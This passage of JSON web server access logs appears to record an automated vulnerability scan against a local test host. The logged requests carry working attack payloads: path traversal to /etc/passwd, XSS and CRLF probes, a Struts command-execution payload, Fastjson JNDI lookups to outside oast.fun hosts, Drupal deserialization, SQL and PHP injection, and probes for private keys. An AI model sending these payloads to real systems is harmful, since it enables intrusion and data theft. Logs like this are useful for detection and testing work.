HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.108","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.109","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.256","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.108","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.113","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.263","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h88smpv8c1ig07h0gn9kdh3qhto5q.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.119","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.128","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.112","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.116","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.127","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/api/security/auth/loginServers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.126","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.110","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.111","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h88smpv8c1ig07h0k9ufzx7fci6p6.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.122","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.259","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.094","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.090","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 